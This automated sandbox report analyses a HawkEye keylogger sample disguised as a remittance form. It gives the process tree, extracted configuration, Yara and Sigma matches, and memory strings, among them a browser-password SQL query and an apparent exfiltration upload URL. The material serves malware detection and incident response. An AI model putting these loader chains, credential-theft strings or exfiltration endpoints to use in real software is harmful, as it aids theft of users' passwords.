Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report E-Remittance Form_z.TXT.exe

Overview

General Information

Sample Name:E-Remittance Form_z.TXT.exe
Analysis ID:465268
MD5:0c3bdc11fd6454bb67da849864170b44
SHA1:1c925518e075761758a47f677016c95f5e80c92c
SHA256:bdade907a458b6c9d2e87af5667c3b8a16aa7804535634ed662b0e07c34f64b1
Tags:exeHawkEye
Infos:

Most interesting Screenshot:

Detection

HawkEye MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected HawkEye Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected AntiVM autoit script
Yara detected AntiVM3
Yara detected HawkEye Keylogger
Yara detected MailPassView
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses an obfuscated file name to hide its real file extension (double extension)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Antivirus or Machine Learning detection for unpacked file
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • E-Remittance Form_z.TXT.exe (PID: 5956 cmdline: 'C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe' MD5: 0C3BDC11FD6454BB67DA849864170B44)
    • urdavsa.pif (PID: 3588 cmdline: 'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htg MD5: CDBB08D4234736C4A052DC3F181E66F2)
      • wscript.exe (PID: 2520 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
        • urdavsa.pif (PID: 5708 cmdline: 'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htg MD5: CDBB08D4234736C4A052DC3F181E66F2)
          • wscript.exe (PID: 5564 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
            • urdavsa.pif (PID: 2232 cmdline: 'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htg MD5: CDBB08D4234736C4A052DC3F181E66F2)
              • wscript.exe (PID: 1360 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
                • urdavsa.pif (PID: 5552 cmdline: 'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htg MD5: CDBB08D4234736C4A052DC3F181E66F2)
                  • RegSvcs.exe (PID: 4684 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["mailpv", "WebBrowserPassView", "browserpv"], "Version": "HawkEye Keylogger - Reborn v9{"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001C.00000002.584515573.0000000000982000.00000040.00000001.sdmpMAL_HawkEye_Keylogger_Gen_Dec18Detects HawkEye Keylogger RebornFlorian Roth
  • 0x87a2e:$s1: HawkEye Keylogger
  • 0x87a97:$s1: HawkEye Keylogger
  • 0x80e71:$s2: _ScreenshotLogger
  • 0x80e3e:$s3: _PasswordStealer
0000001C.00000002.584515573.0000000000982000.00000040.00000001.sdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
    0000001C.00000002.586361746.0000000003234000.00000004.00000001.sdmpMAL_HawkEye_Keylogger_Gen_Dec18Detects HawkEye Keylogger RebornFlorian Roth
    • 0x77bbc:$s2: _ScreenshotLogger
    • 0x78108:$s2: _ScreenshotLogger
    • 0x77b89:$s3: _PasswordStealer
    • 0x780d5:$s3: _PasswordStealer
    0000001C.00000002.586361746.0000000003234000.00000004.00000001.sdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
      00000019.00000003.580526774.0000000004A10000.00000004.00000001.sdmpMAL_HawkEye_Keylogger_Gen_Dec18Detects HawkEye Keylogger RebornFlorian Roth
      • 0x87c4e:$s1: HawkEye Keylogger
      • 0x87cb7:$s1: HawkEye Keylogger
      • 0x81091:$s2: _ScreenshotLogger
      • 0x8105e:$s3: _PasswordStealer
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      28.2.RegSvcs.exe.7da834a.4.unpackAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
      • 0x11bb0:$a1: logins.json
      • 0x11b10:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
      • 0x12334:$s4: \mozsqlite3.dll
      • 0x115a4:$s5: SMTP Password
      28.2.RegSvcs.exe.7da834a.4.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
        28.2.RegSvcs.exe.980000.0.unpackMAL_HawkEye_Keylogger_Gen_Dec18Detects HawkEye Keylogger RebornFlorian Roth
        • 0x87c2e:$s1: HawkEye Keylogger
        • 0x87c97:$s1: HawkEye Keylogger
        • 0x81071:$s2: _ScreenshotLogger
        • 0x8103e:$s3: _PasswordStealer
        28.2.RegSvcs.exe.980000.0.unpackSUSP_NET_NAME_ConfuserExDetects ConfuserEx packed fileArnim Rupp
        • 0x87601:$name: ConfuserEx
        • 0x8630e:$compile: AssemblyTitle
        28.2.RegSvcs.exe.980000.0.unpackJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
          Click to see the 27 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Suspicious Script Execution From Temp FolderShow sources
          Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htg, ParentImage: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif, ParentProcessId: 3588, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs' , ProcessId: 2520
          Sigma detected: WScript or CScript DropperShow sources
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htg, ParentImage: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif, ParentProcessId: 3588, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs' , ProcessId: 2520
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htg, ParentImage: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif, ParentProcessId: 5552, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4684

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: RegSvcs.exe.4684.28.memstrminMalware Configuration Extractor: HawkEye {"Modules": ["mailpv", "WebBrowserPassView", "browserpv"], "Version": "HawkEye Keylogger - Reborn v9{"}
          Multi AV Scanner detection for domain / URLShow sources
          Source: https://a.pomf.cat/Virustotal: Detection: 7%Perma Link
          Source: http://pomf.cat/upload.phpVirustotal: Detection: 8%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifMetadefender: Detection: 31%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifReversingLabs: Detection: 46%
          Source: 28.2.RegSvcs.exe.980000.0.unpackAvira: Label: TR/Dropper.Gen
          Source: E-Remittance Form_z.TXT.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: E-Remittance Form_z.TXT.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: E-Remittance Form_z.TXT.exe
          Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: RegSvcs.exe, 0000001C.00000002.589273699.0000000007D50000.00000004.00000001.sdmp
          Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: RegSvcs.exe, 0000001C.00000002.589273699.0000000007D50000.00000004.00000001.sdmp
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009EA2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_009EA2DF
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009FAFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_009FAFB9
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_00A09FD3 FindFirstFileExA,1_2_00A09FD3
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 2_2_00AC399B GetFileAttributesW,FindFirstFileW,FindClose,2_2_00AC399B
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AC399B GetFileAttributesW,FindFirstFileW,FindClose,10_2_00AC399B
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AE2408 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00AE2408
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AD280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00AD280D
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00B08877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_00B08877
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AECAE7 FindFirstFileW,FindNextFileW,FindClose,10_2_00AECAE7
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AC1A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00AC1A73
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00ADBCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,10_2_00ADBCB3
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AEDE7C FindFirstFileW,FindClose,10_2_00AEDE7C
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00ADBF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00ADBF17
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifFile opened: C:\Users\user\AppData\LocalJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifFile opened: C:\Users\user\AppData\Local\Temp\82139548\rpgc.htgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifFile opened: C:\Users\user\AppData\Local\TempJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifFile opened: C:\Users\user\AppData\Local\Temp\82139548Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AD2285 InternetQueryDataAvailable,InternetReadFile,10_2_00AD2285
          Source: RegSvcs.exe, 0000001C.00000002.589273699.0000000007D50000.00000004.00000001.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
          Source: RegSvcs.exe, 0000001C.00000002.589273699.0000000007D50000.00000004.00000001.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
          Source: RegSvcs.exe, 0000001C.00000002.586361746.0000000003234000.00000004.00000001.sdmpString found in binary or memory: http://bot.whatismyipaddress.com/
          Source: urdavsa.pif.1.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
          Source: urdavsa.pif.1.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
          Source: urdavsa.pif.1.drString found in binary or memory: http://crl.globalsign.net/Timestamping1.crl0
          Source: urdavsa.pif.1.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0N
          Source: urdavsa.pif.1.drString found in binary or memory: http://crl.globalsign.net/root.crl0
          Source: RegSvcs.exe, 0000001C.00000002.586361746.0000000003234000.00000004.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.php
          Source: urdavsa.pif, 00000019.00000003.580526774.0000000004A10000.00000004.00000001.sdmp, RegSvcs.exe, 0000001C.00000002.584515573.0000000000982000.00000040.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.php&https://a.pomf.cat/
          Source: RegSvcs.exe, 0000001C.00000002.586361746.0000000003234000.00000004.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.phpCContent-Disposition:
          Source: urdavsa.pif.1.drString found in binary or memory: http://secure.globalsign.net/cacert/ObjectSign.crt09
          Source: urdavsa.pif.1.drString found in binary or memory: http://secure.globalsign.net/cacert/PrimObject.crt0
          Source: urdavsa.pif.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/0
          Source: urdavsa.pif.1.drString found in binary or memory: http://www.globalsign.net/repository/0
          Source: urdavsa.pif.1.drString found in binary or memory: http://www.globalsign.net/repository/03
          Source: urdavsa.pif.1.drString found in binary or memory: http://www.globalsign.net/repository09
          Source: RegSvcs.exe, 0000001C.00000002.589273699.0000000007D50000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
          Source: RegSvcs.exe, 0000001C.00000002.586361746.0000000003234000.00000004.00000001.sdmpString found in binary or memory: https://a.pomf.cat/

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Yara detected HawkEye KeyloggerShow sources
          Source: Yara matchFile source: 28.2.RegSvcs.exe.980000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001C.00000002.584515573.0000000000982000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.586361746.0000000003234000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000003.580526774.0000000004A10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: urdavsa.pif PID: 5552, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4684, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AEA0FC OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00AEA0FC
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AFD8E9 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,10_2_00AFD8E9
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AD42E1 GetParent,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,PostMessageW,PostMessageW,10_2_00AD42E1
          Source: urdavsa.pif, 00000002.00000002.392280466.0000000000CCA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00B0C7D6 SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_00B0C7D6

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 28.2.RegSvcs.exe.7da834a.4.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
          Source: 28.2.RegSvcs.exe.980000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
          Source: 28.2.RegSvcs.exe.980000.0.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
          Source: 28.3.RegSvcs.exe.4aedbda.2.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
          Source: 28.3.RegSvcs.exe.4aedbda.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
          Source: 28.2.RegSvcs.exe.7d50000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
          Source: 28.3.RegSvcs.exe.4a95890.1.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
          Source: 28.2.RegSvcs.exe.7d50000.3.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
          Source: 28.2.RegSvcs.exe.7da834a.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
          Source: 28.3.RegSvcs.exe.4a95890.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
          Source: 28.3.RegSvcs.exe.4a95bd5.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
          Source: 28.2.RegSvcs.exe.7d50345.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
          Source: 0000001C.00000002.584515573.0000000000982000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
          Source: 0000001C.00000002.586361746.0000000003234000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
          Source: 00000019.00000003.580526774.0000000004A10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
          Source: 0000001C.00000002.589273699.0000000007D50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
          Source: Process Memory Space: urdavsa.pif PID: 5552, type: MEMORYSTRMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
          Source: Process Memory Space: RegSvcs.exe PID: 4684, type: MEMORYSTRMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009E6FC6: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,1_2_009E6FC6
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AD6219 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00AD6219
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AC33A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,10_2_00AC33A3
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009E83C01_2_009E83C0
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_00A0C0B01_2_00A0C0B0
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009E30FC1_2_009E30FC
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_00A001131_2_00A00113
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009F626D1_2_009F626D
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009F33D31_2_009F33D3
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009FF3CA1_2_009FF3CA
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009EF5C51_2_009EF5C5
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009EE5101_2_009EE510
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_00A005481_2_00A00548
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_00A0C55E1_2_00A0C55E
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009E26921_2_009E2692
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009F66A21_2_009F66A2
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009F364E1_2_009F364E
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_00A106541_2_00A10654
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009F589E1_2_009F589E
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009FF8C61_2_009FF8C6
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009F397F1_2_009F397F
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009EE9731_2_009EE973
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009EDADD1_2_009EDADD
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009EBAD11_2_009EBAD1
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_00A03CBA1_2_00A03CBA
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009FFCDE1_2_009FFCDE
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009F6CDB1_2_009F6CDB
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009E5D7E1_2_009E5D7E
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009E3EAD1_2_009E3EAD
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_00A03EE91_2_00A03EE9
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009EDF121_2_009EDF12
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 2_2_00A998F02_2_00A998F0
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 2_2_00A935F02_2_00A935F0
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 2_2_00AB088F2_2_00AB088F
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 2_2_00AAC8CE2_2_00AAC8CE
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 2_2_00AAA1372_2_00AAA137
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 2_2_00AA19032_2_00AA1903
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 2_2_00AB1F2C2_2_00AB1F2C
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 2_2_00AA37212_2_00AA3721
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 2_2_00A9F7302_2_00A9F730
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00A935F010_2_00A935F0
